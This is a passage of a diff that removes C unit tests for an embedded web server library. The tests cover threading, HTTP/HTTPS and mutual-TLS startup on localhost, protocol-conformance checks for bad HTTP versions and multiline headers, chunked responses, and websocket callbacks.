-#ifdef LOCAL_TEST
-	sprintf(r_path, "%s\\", a_path);
-#else
-	/* Appveyor */
-	sprintf(r_path, "..\\..\\..\\%s\\", a_path);
-/* TODO: the different paths
- * used in the different test
- * system is an unsolved
- * problem. */
-#endif
-#else
-#ifdef LOCAL_TEST
-	sprintf(r_path, "%s/", a_path);
-#else
-	/* Travis */
-	sprintf(r_path,
-	        "../../%s/",
-	        a_path); // TODO: fix path in CI test environment
-#endif
-#endif
-
-	return r_path;
-}
-
-
-#define locate_resources() locate_path("resources")
-#define locate_test_exes() locate_path("output")
-
-
-static const char *
-locate_ssl_cert(void)
-{
-	static char cert_path[256];
-	const char *res = locate_resources();
-	size_t l;
-
-	ck_assert(res != NULL);
-	l = strlen(res);
-	ck_assert_uint_gt(l, 0);
-	ck_assert_uint_lt(l, 100); /* assume there is enough space left in our
-	                              typical 255 character string buffers */
-
-	strcpy(cert_path, res);
-	strcat(cert_path, "ssl_cert.pem");
-	return cert_path;
-}
-
-
-static int
-wait_not_null(void *volatile *data)
-{
-	int i;
-	for (i = 0; i < 100; i++) {
-		mark_point();
-		test_sleep(1);
-
-		if (*data != NULL) {
-			mark_point();
-			return 1;
-		}
-	}
-
-#if defined(__MINGW32__) || defined(__GNUC__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunreachable-code"
-#pragma GCC diagnostic ignored "-Wunreachable-code-return"
-#endif
-
-	ck_abort_msg("wait_not_null failed (%i sec)", i);
-
-	return 0;
-
-#if defined(__MINGW32__) || defined(__GNUC__)
-#pragma GCC diagnostic pop
-#endif
-}
-
-
-START_TEST(test_the_test_environment)
-{
-	char wd[300];
-	char buf[500];
-	FILE *f;
-	struct stat st;
-	int ret;
-	const char *ssl_cert = locate_ssl_cert();
-
-	memset(wd, 0, sizeof(wd));
-	memset(buf, 0, sizeof(buf));
-
-/* Get the current working directory */
-#ifdef _WIN32
-	(void)GetCurrentDirectoryA(sizeof(wd), wd);
-	wd[sizeof(wd) - 1] = 0;
-#else
-	(void)getcwd(wd, sizeof(wd));
-	wd[sizeof(wd) - 1] = 0;
-#endif
-
-/* Check the pem file */
-#ifdef _WIN32
-	strcpy(buf, wd);
-	strcat(buf, "\\");
-	strcat(buf, ssl_cert);
-	f = fopen(buf, "rb");
-#else
-	strcpy(buf, wd);
-	strcat(buf, "/");
-	strcat(buf, ssl_cert);
-	f = fopen(buf, "r");
-#endif
-
-	if (f) {
-		fclose(f);
-	} else {
-		fprintf(stderr, "%s not found", buf);
-	}
-
-/* Check the test dir */
-#ifdef _WIN32
-	strcpy(buf, wd);
-	strcat(buf, "\\test");
-#else
-	strcpy(buf, wd);
-	strcat(buf, "/test");
-#endif
-
-	memset(&st, 0, sizeof(st));
-	ret = stat(buf, &st);
-
-	if (ret) {
-		fprintf(stderr, "%s not found", buf);
-	}
-
-
-#ifdef _WIN32
-/* Try to copy the files required for AppVeyor */
-#if defined(_WIN64) || defined(__MINGW64__)
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\libeay32.dll libeay32.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\libssl32.dll libssl32.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\ssleay32.dll ssleay32.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\libeay32.dll libeay64.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\libssl32.dll libssl64.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\ssleay32.dll ssleay64.dll");
-#else
-	(void)system("cmd /c copy C:\\OpenSSL-Win32\\libeay32.dll libeay32.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win32\\libssl32.dll libssl32.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win32\\ssleay32.dll ssleay32.dll");
-#endif
-#endif
-}
-END_TEST
-
-
-static void *threading_data = 0;
-
-static void *
-test_thread_func_t(void *param)
-{
-	ck_assert_ptr_eq(param, &threading_data);
-	ck_assert_ptr_eq(threading_data, NULL);
-	threading_data = &threading_data;
-	return NULL;
-}
-
-
-START_TEST(test_threading)
-{
-	int ok;
-
-	threading_data = NULL;
-	mark_point();
-
-	ok = mg_start_thread(test_thread_func_t, &threading_data);
-	ck_assert_int_eq(ok, 0);
-
-	wait_not_null(&threading_data);
-	ck_assert_ptr_eq(threading_data, &threading_data);
-}
-END_TEST
-
-
-static int
-log_msg_func(const struct mg_connection *conn, const char *message)
-{
-	struct mg_context *ctx;
-	char *ud;
-
-	ck_assert(conn != NULL);
-	ctx = mg_get_context(conn);
-	ck_assert(ctx != NULL);
-	ud = (char *)mg_get_user_data(ctx);
-
-	strncpy(ud, message, 255);
-	ud[255] = 0;
-	mark_point();
-
-	printf("LOG_MSG_FUNC: %s\n", message);
-	mark_point();
-
-	return 1; /* Return 1 means "already handled" */
-}
-
-
-static int
-test_log_message(const struct mg_connection *conn, const char *message)
-{
-	(void)conn;
-
-	printf("LOG_MESSAGE: %s\n", message);
-	mark_point();
-
-	return 0; /* Return 0 means "not yet handled" */
-}
-
-
-static struct mg_context *
-test_mg_start(const struct mg_callbacks *callbacks,
-              void *user_data,
-              const char **configuration_options)
-{
-	struct mg_context *ctx;
-	struct mg_callbacks cb;
-
-	if (callbacks) {
-		memcpy(&cb, callbacks, sizeof(cb));
-	} else {
-		memset(&cb, 0, sizeof(cb));
-	}
-
-	if (cb.log_message == NULL) {
-		cb.log_message = test_log_message;
-	}
-
-	mark_point();
-	test_sleep(SLEEP_BEFORE_MG_START);
-	mark_point();
-	ctx = mg_start(&cb, user_data, configuration_options);
-	mark_point();
-	if (ctx) {
-		/* Give the server some time to start in the test VM */
-		/* Don't need to do this if mg_start failed */
-		test_sleep(SLEEP_AFTER_MG_START);
-	}
-	mark_point();
-
-	return ctx;
-}
-
-
-static void
-test_mg_stop(struct mg_context *ctx)
-{
-#ifdef __MACH__
-	/* For unknown reasons, there are sporadic hands
-	 * for OSX if mark_point is called here */
-	test_sleep(SLEEP_BEFORE_MG_STOP);
-	mg_stop(ctx);
-	test_sleep(SLEEP_AFTER_MG_STOP);
-#else
-	mark_point();
-	test_sleep(SLEEP_BEFORE_MG_STOP);
-	mark_point();
-	mg_stop(ctx);
-	mark_point();
-	test_sleep(SLEEP_AFTER_MG_STOP);
-	mark_point();
-#endif
-}
-
-
-static void
-test_mg_start_stop_http_server_impl(int ipv6)
-{
-	struct mg_context *ctx;
-	const char *OPTIONS[16];
-	int optcnt = 0;
-	const char *localhost_name = ((ipv6) ? "[::1]" : "127.0.0.1");
-
-#if defined(MG_LEGACY_INTERFACE)
-	size_t ports_cnt;
-	int ports[16];
-	int ssl[16];
-#endif
-	struct mg_callbacks callbacks;
-	char errmsg[256];
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res, ret;
-	struct mg_server_ports portinfo[8];
-
-	mark_point();
-
-#if !defined(NO_FILES)
-	OPTIONS[optcnt++] = "document_root";
-	OPTIONS[optcnt++] = ".";
-#endif
-	OPTIONS[optcnt++] = "listening_ports";
-	OPTIONS[optcnt++] = ((ipv6) ? "+8080" : "8080");
-	OPTIONS[optcnt] = 0;
-
-#if defined(MG_LEGACY_INTERFACE)
-	memset(ports, 0, sizeof(ports));
-	memset(ssl, 0, sizeof(ssl));
-#endif
-	memset(portinfo, 0, sizeof(portinfo));
-	memset(&callbacks, 0, sizeof(callbacks));
-	memset(errmsg, 0, sizeof(errmsg));
-
-	callbacks.log_message = log_msg_func;
-
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-#if defined(MG_LEGACY_INTERFACE)
-	ports_cnt = mg_get_ports(ctx, 16, ports, ssl);
-	ck_assert_uint_eq(ports_cnt, 1);
-	ck_assert_int_eq(ports[0], 8080);
-	ck_assert_int_eq(ssl[0], 0);
-	ck_assert_int_eq(ports[1], 0);
-	ck_assert_int_eq(ssl[1], 0);
-#endif
-
-	ret = mg_get_server_ports(ctx, 0, portinfo);
-	ck_assert_int_lt(ret, 0);
-	ck_assert_int_eq(portinfo[0].protocol, 0);
-	ck_assert_int_eq(portinfo[0].port, 0);
-	ck_assert_int_eq(portinfo[0].is_ssl, 0);
-	ck_assert_int_eq(portinfo[0].is_redirect, 0);
-	ck_assert_int_eq(portinfo[1].protocol, 0);
-	ck_assert_int_eq(portinfo[1].port, 0);
-	ck_assert_int_eq(portinfo[1].is_ssl, 0);
-	ck_assert_int_eq(portinfo[1].is_redirect, 0);
-
-	ret = mg_get_server_ports(ctx, 4, portinfo);
-	ck_assert_int_eq(ret, 1);
-	if (ipv6) {
-		ck_assert_int_eq(portinfo[0].protocol, 3);
-	} else {
-		ck_assert_int_eq(portinfo[0].protocol, 1);
-	}
-	ck_assert_int_eq(portinfo[0].port, 8080);
-	ck_assert_int_eq(portinfo[0].is_ssl, 0);
-	ck_assert_int_eq(portinfo[0].is_redirect, 0);
-	ck_assert_int_eq(portinfo[1].protocol, 0);
-	ck_assert_int_eq(portinfo[1].port, 0);
-	ck_assert_int_eq(portinfo[1].is_ssl, 0);
-	ck_assert_int_eq(portinfo[1].is_redirect, 0);
-
-	test_sleep(1);
-
-	/* HTTP 1.0 GET request */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn = mg_connect_client(
-	    localhost_name, 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	/* TODO: ck_assert_str_eq(client_ri->request_method, "HTTP/1.0"); */
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-#endif
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* HTTP 1.1 GET request */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn = mg_connect_client(
-	    localhost_name, 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.1\r\n");
-	mg_printf(client_conn, "Host: localhost:8080\r\n");
-	mg_printf(client_conn, "Connection: close\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	/* TODO: ck_assert_str_eq(client_ri->request_method, "HTTP/1.0"); */
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-#endif
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-
-	/* HTTP 1.7 GET request - this HTTP version does not exist  */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn = mg_connect_client(
-	    localhost_name, 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.7\r\n");
-	mg_printf(client_conn, "Host: localhost:8080\r\n");
-	mg_printf(client_conn, "Connection: close\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	/* Response must be 505 HTTP Version not supported */
-	ck_assert_str_eq(client_ri->local_uri, "505");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-
-	/* HTTP request with multiline header.
-	 * Multiline header are obsolete with RFC 7230 section-3.2.4
-	 * and must return "400 Bad Request" */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn = mg_connect_client(
-	    localhost_name, 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.1\r\n");
-	mg_printf(client_conn, "Host: localhost:8080\r\n");
-	mg_printf(client_conn, "X-Obsolete-Header: something\r\nfor nothing\r\n");
-	mg_printf(client_conn, "Connection: close\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	/* Response must be 400 Bad Request */
-	ck_assert_str_eq(client_ri->local_uri, "400");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* End test */
-	test_mg_stop(ctx);
-	mark_point();
-}
-
-
-START_TEST(test_mg_start_stop_http_server)
-{
-	mark_point();
-	test_mg_start_stop_http_server_impl(0);
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_mg_start_stop_http_server_ipv6)
-{
-	mark_point();
-#if defined(USE_IPV6)
-	test_mg_start_stop_http_server_impl(1);
-#endif
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_mg_start_stop_https_server)
-{
-#ifndef NO_SSL
-
-	struct mg_context *ctx;
-
-#if defined(MG_LEGACY_INTERFACE)
-	size_t ports_cnt;
-	int ports[16];
-	int ssl[16];
-#endif
-	struct mg_callbacks callbacks;
-	char errmsg[256];
-
-	const char *OPTIONS[8]; /* initializer list here is rejected by CI test */
-	int opt_idx = 0;
-	const char *ssl_cert = locate_ssl_cert();
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res, ret;
-	struct mg_server_ports portinfo[8];
-
-	ck_assert(ssl_cert != NULL);
-
-	memset((void *)OPTIONS, 0, sizeof(OPTIONS));
-#if !defined(NO_FILES)
-	OPTIONS[opt_idx++] = "document_root";
-	OPTIONS[opt_idx++] = ".";
-#endif
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = "8080r,8443s";
-	OPTIONS[opt_idx++] = "ssl_certificate";
-	OPTIONS[opt_idx++] = ssl_cert;
-
-	ck_assert_int_le(opt_idx, (int)(sizeof(OPTIONS) / sizeof(OPTIONS[0])));
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 1] == NULL);
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 2] == NULL);
-
-#if defined(MG_LEGACY_INTERFACE)
-	memset(ports, 0, sizeof(ports));
-	memset(ssl, 0, sizeof(ssl));
-#endif
-	memset(portinfo, 0, sizeof(portinfo));
-	memset(&callbacks, 0, sizeof(callbacks));
-	memset(errmsg, 0, sizeof(errmsg));
-
-	callbacks.log_message = log_msg_func;
-
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-#if defined(MG_LEGACY_INTERFACE)
-	ports_cnt = mg_get_ports(ctx, 16, ports, ssl);
-	ck_assert_uint_eq(ports_cnt, 2);
-	ck_assert_int_eq(ports[0], 8080);
-	ck_assert_int_eq(ssl[0], 0);
-	ck_assert_int_eq(ports[1], 8443);
-	ck_assert_int_eq(ssl[1], 1);
-	ck_assert_int_eq(ports[2], 0);
-	ck_assert_int_eq(ssl[2], 0);
-#endif
-
-	ret = mg_get_server_ports(ctx, 0, portinfo);
-	ck_assert_int_lt(ret, 0);
-	ck_assert_int_eq(portinfo[0].protocol, 0);
-	ck_assert_int_eq(portinfo[0].port, 0);
-	ck_assert_int_eq(portinfo[0].is_ssl, 0);
-	ck_assert_int_eq(portinfo[0].is_redirect, 0);
-	ck_assert_int_eq(portinfo[1].protocol, 0);
-	ck_assert_int_eq(portinfo[1].port, 0);
-	ck_assert_int_eq(portinfo[1].is_ssl, 0);
-	ck_assert_int_eq(portinfo[1].is_redirect, 0);
-
-	ret = mg_get_server_ports(ctx, 4, portinfo);
-	ck_assert_int_eq(ret, 2);
-	ck_assert_int_eq(portinfo[0].protocol, 1);
-	ck_assert_int_eq(portinfo[0].port, 8080);
-	ck_assert_int_eq(portinfo[0].is_ssl, 0);
-	ck_assert_int_eq(portinfo[0].is_redirect, 1);
-	ck_assert_int_eq(portinfo[1].protocol, 1);
-	ck_assert_int_eq(portinfo[1].port, 8443);
-	ck_assert_int_eq(portinfo[1].is_ssl, 1);
-	ck_assert_int_eq(portinfo[1].is_redirect, 0);
-	ck_assert_int_eq(portinfo[2].protocol, 0);
-	ck_assert_int_eq(portinfo[2].port, 0);
-	ck_assert_int_eq(portinfo[2].is_ssl, 0);
-	ck_assert_int_eq(portinfo[2].is_redirect, 0);
-
-	test_sleep(1);
-
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8443, 1, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	/* TODO: ck_assert_str_eq(client_ri->request_method, "HTTP/1.0"); */
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-#endif
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	test_mg_stop(ctx);
-	mark_point();
-#endif
-}
-END_TEST
-
-
-START_TEST(test_mg_server_and_client_tls)
-{
-#ifndef NO_SSL
-
-	struct mg_context *ctx;
-
-	int ports_cnt;
-	struct mg_server_ports ports[16];
-	struct mg_callbacks callbacks;
-	char errmsg[256];
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res;
-	struct mg_client_options client_options;
-
-	const char *OPTIONS[32]; /* initializer list here is rejected by CI test */
-	int opt_idx = 0;
-	char server_cert[256];
-	char client_cert[256];
-	const char *res_dir = locate_resources();
-
-	ck_assert(res_dir != NULL);
-	strcpy(server_cert, res_dir);
-	strcpy(client_cert, res_dir);
-#ifdef _WIN32
-	strcat(server_cert, "cert\\server.pem");
-	strcat(client_cert, "cert\\client.pem");
-#else
-	strcat(server_cert, "cert/server.pem");
-	strcat(client_cert, "cert/client.pem");
-#endif
-
-	memset((void *)OPTIONS, 0, sizeof(OPTIONS));
-#if !defined(NO_FILES)
-	OPTIONS[opt_idx++] = "document_root";
-	OPTIONS[opt_idx++] = ".";
-#endif
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = "8080r,8443s";
-	OPTIONS[opt_idx++] = "ssl_certificate";
-	OPTIONS[opt_idx++] = server_cert;
-	OPTIONS[opt_idx++] = "ssl_verify_peer";
-	OPTIONS[opt_idx++] = "yes";
-	OPTIONS[opt_idx++] = "ssl_ca_file";
-	OPTIONS[opt_idx++] = client_cert;
-
-	ck_assert_int_le(opt_idx, (int)(sizeof(OPTIONS) / sizeof(OPTIONS[0])));
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 1] == NULL);
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 2] == NULL);
-
-	memset(ports, 0, sizeof(ports));
-	memset(&callbacks, 0, sizeof(callbacks));
-	memset(errmsg, 0, sizeof(errmsg));
-
-	callbacks.log_message = log_msg_func;
-
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-	ports_cnt = mg_get_server_ports(ctx, 16, ports);
-	ck_assert_int_eq(ports_cnt, 2);
-	ck_assert_int_eq(ports[0].protocol, 1);
-	ck_assert_int_eq(ports[0].port, 8080);
-	ck_assert_int_eq(ports[0].is_ssl, 0);
-	ck_assert_int_eq(ports[0].is_redirect, 1);
-	ck_assert_int_eq(ports[1].protocol, 1);
-	ck_assert_int_eq(ports[1].port, 8443);
-	ck_assert_int_eq(ports[1].is_ssl, 1);
-	ck_assert_int_eq(ports[1].is_redirect, 0);
-	ck_assert_int_eq(ports[2].protocol, 0);
-	ck_assert_int_eq(ports[2].port, 0);
-	ck_assert_int_eq(ports[2].is_ssl, 0);
-	ck_assert_int_eq(ports[2].is_redirect, 0);
-
-	test_sleep(1);
-
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8443, 1, client_err, sizeof(client_err));
-
-	ck_assert_str_ne(client_err, "");
-	ck_assert(client_conn == NULL);
-
-	memset(client_err, 0, sizeof(client_err));
-	memset(&client_options, 0, sizeof(client_options));
-	client_options.host = "127.0.0.1";
-	client_options.port = 8443;
-	client_options.client_cert = client_cert;
-	client_options.server_cert = server_cert;
-
-	client_conn = mg_connect_client_secure(&client_options,
-	                                       client_err,
-	                                       sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	/* TODO: ck_assert_str_eq(client_ri->request_method, "HTTP/1.0"); */
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-#endif
-	mg_close_connection(client_conn);
-
-	/* TODO: A client API using a client certificate is missing */
-
-	test_sleep(1);
-
-	test_mg_stop(ctx);
-#endif
-	mark_point();
-}
-END_TEST
-
-
-static struct mg_context *g_ctx;
-
-static int
-request_test_handler(struct mg_connection *conn, void *cbdata)
-{
-	int i;
-	char chunk_data[32];
-	const struct mg_request_info *ri;
-	struct mg_context *ctx;
-	void *ud, *cud;
-	void *dummy = malloc(1);
-
-	ctx = mg_get_context(conn);
-	ud = mg_get_user_data(ctx);
-	ri = mg_get_request_info(conn);
-
-	ck_assert(ri != NULL);
-	ck_assert(ctx == g_ctx);
-	ck_assert(ud == &g_ctx);
-
-	ck_assert(dummy != NULL);
-
-	mg_set_user_connection_data(conn, (void *)&dummy);
-	cud = mg_get_user_connection_data(conn);
-	ck_assert_ptr_eq((void *)cud, (void *)&dummy);
-
-	mg_set_user_connection_data(conn, (void *)NULL);
-	cud = mg_get_user_connection_data(conn);
-	ck_assert_ptr_eq((void *)cud, (void *)NULL);
-
-	free(dummy);
-
-	ck_assert_ptr_eq((void *)cbdata, (void *)(ptrdiff_t)7);
-	strcpy(chunk_data, "123456789A123456789B123456789C");
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Transfer-Encoding: chunked\r\n"
-	          "Content-Type: text/plain\r\n\r\n");
-
-	for (i = 1; i <= 10; i++) {
-		mg_printf(conn, "%x\r\n", i);
-		mg_write(conn, chunk_data, (unsigned)i);
-		mg_printf(conn, "\r\n");
-	}
-
-	mg_printf(conn, "0\r\n\r\n");
-	mark_point();
-
-	return 1;
-}
-
-
-#ifdef USE_WEBSOCKET
-/****************************************************************************/
-/* WEBSOCKET SERVER                                                         */
-/****************************************************************************/
-static const char *websocket_welcome_msg = "websocket welcome\n";
-static const size_t websocket_welcome_msg_len =
-    18 /* strlen(websocket_welcome_msg) */;
-static const char *websocket_goodbye_msg = "websocket bye\n";
-static const size_t websocket_goodbye_msg_len =
-    14 /* strlen(websocket_goodbye_msg) */;
-
-
-#if defined(DEBUG)
-static void
-WS_TEST_TRACE(const char *f, ...)
-{
-	va_list l;
-	va_start(l, f);
-	vprintf(f, l);
-	va_end(l);
-}
-#else
-#define WS_TEST_TRACE(...)
-#endif
-
-
-static int
-websock_server_connect(const struct mg_connection *conn, void *udata)
-{
-	(void)conn;
-
-	ck_assert_ptr_eq((void *)udata, (void *)(ptrdiff_t)7531);
-	WS_TEST_TRACE("Server: Websocket connected\n");
-	mark_point();
-
-	return 0; /* return 0 to accept every connection */
-}
-
-
-static void
-websock_server_ready(struct mg_connection *conn, void *udata)
-{
-	ck_assert_ptr_eq((void *)udata, (void *)(ptrdiff_t)7531);
-	ck_assert_ptr_ne((void *)conn, (void *)NULL);
-	WS_TEST_TRACE("Server: Websocket ready\n");
-
-	/* Send websocket welcome message */
-	mg_lock_connection(conn);
-	mg_websocket_write(conn,
-	                   WEBSOCKET_OPCODE_TEXT,
-	                   websocket_welcome_msg,
-	                   websocket_welcome_msg_len);
-	mg_unlock_connection(conn);
-
-	WS_TEST_TRACE("Server: Websocket ready X\n");
-	mark_point();
-}
-
-
-#define long_ws_buf_len_16 (500)
-#define long_ws_buf_len_64 (70000)
-static char long_ws_buf[long_ws_buf_len_64];
-
-
-static int
-websock_server_data(struct mg_connection *conn,
-                    int bits,
-                    char *data,
-                    size_t data_len,
-                    void *udata)
-{
-	(void)bits;
-
-	ck_assert_ptr_eq((void *)udata, (void *)(ptrdiff_t)7531);
-	WS_TEST_TRACE("Server: Got %u bytes from the client\n", (unsigned)data_len);
-
-	if (data_len == 3 && !memcmp(data, "bye", 3)) {
-		/* Send websocket goodbye message */
-		mg_lock_connection(conn);
-		mg_websocket_write(conn,
-		                   WEBSOCKET_OPCODE_TEXT,
-		                   websocket_goodbye_msg,
-		                   websocket_goodbye_msg_len);
-		mg_unlock_connection(conn);
-	} else if (data_len == 5 && !memcmp(data, "data1", 5)) {
-		mg_lock_connection(conn);
-		mg_websocket_write(conn, WEBSOCKET_OPCODE_TEXT, "ok1", 3);
-		mg_unlock_connection(conn);
-	} else if (data_len == 5 && !memcmp(data, "data2", 5)) {
-		mg_lock_connection(conn);
-		mg_websocket_write(conn, WEBSOCKET_OPCODE_TEXT, "ok 2", 4);
-		mg_unlock_connection(conn);
-	} else if (data_len == 5 && !memcmp(data, "data3", 5)) {
-		mg_lock_connection(conn);
-		mg_websocket_write(conn, WEBSOCKET_OPCODE_TEXT, "ok - 3", 6);
-		mg_unlock_connection(conn);
-	} else if (data_len == long_ws_buf_len_16) {
-		ck_assert(memcmp(data, long_ws_buf, long_ws_buf_len_16) == 0);
-		mg_lock_connection(conn);
-		mg_websocket_write(conn,
-		                   WEBSOCKET_OPCODE_BINARY,
-		                   long_ws_buf,
-		                   long_ws_buf_len_16);
-		mg_unlock_connection(conn);
-	} else if (data_len == long_ws_buf_len_64) {
-		ck_assert(memcmp(data, long_ws_buf, long_ws_buf_len_64) == 0);
-		mg_lock_connection(conn);
-		mg_websocket_write(conn,
-		                   WEBSOCKET_OPCODE_BINARY,
-		                   long_ws_buf,
-		                   long_ws_buf_len_64);
-		mg_unlock_connection(conn);
-	} else {
-
-#if defined(__MINGW32__) || defined(__GNUC__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunreachable-code"
-#endif
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunreachable-code"
-#endif
-
-		ck_abort_msg("Got unexpected message from websocket client");
-
-
-		return 0;
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-#if defined(__MINGW32__) || defined(__GNUC__)
-#pragma GCC diagnostic pop
-#endif
-	}
-	mark_point();
-
-	return 1; /* return 1 to keep the connetion open */
-}
-
-
-static void
-websock_server_close(const struct mg_connection *conn, void *udata)
-{
-#ifndef __MACH__
-	ck_assert_ptr_eq((void *)udata, (void *)(ptrdiff_t)7531);
-	WS_TEST_TRACE("Server: Close connection\n");
-
-	/* Can not send a websocket goodbye message here -
-	 * the connection is already closed */
-
-	mark_point();
-#endif
-
-	(void)conn;
-	(void)udata;
-}
-
-
-/****************************************************************************/
-/* WEBSOCKET CLIENT                                                         */
-/****************************************************************************/
-struct tclient_data {
-	void *data;
-	size_t len;
-	int closed;
-	int clientId;
-};
-
-
-static int
-websocket_client_data_handler(struct mg_connection *conn,
-                              int flags,
-                              char *data,
-                              size_t data_len,
-                              void *user_data)
-{
-	struct mg_context *ctx = mg_get_context(conn);
-	struct tclient_data *pclient_data =
-	    (struct tclient_data *)mg_get_user_data(ctx);
-
-	ck_assert_ptr_eq(user_data, (void *)pclient_data);
-
-	ck_assert(pclient_data != NULL);
-	ck_assert_int_gt(flags, 128);
-	ck_assert_int_lt(flags, 128 + 16);
-	ck_assert((flags == (int)(128 | WEBSOCKET_OPCODE_BINARY))
-	          || (flags == (int)(128 | WEBSOCKET_OPCODE_TEXT)));
-
-	if (flags == (int)(128 | WEBSOCKET_OPCODE_TEXT)) {
-		WS_TEST_TRACE(
-		    "Client %i received %lu bytes text data from server: %.*s\n",
-		    pclient_data->clientId,
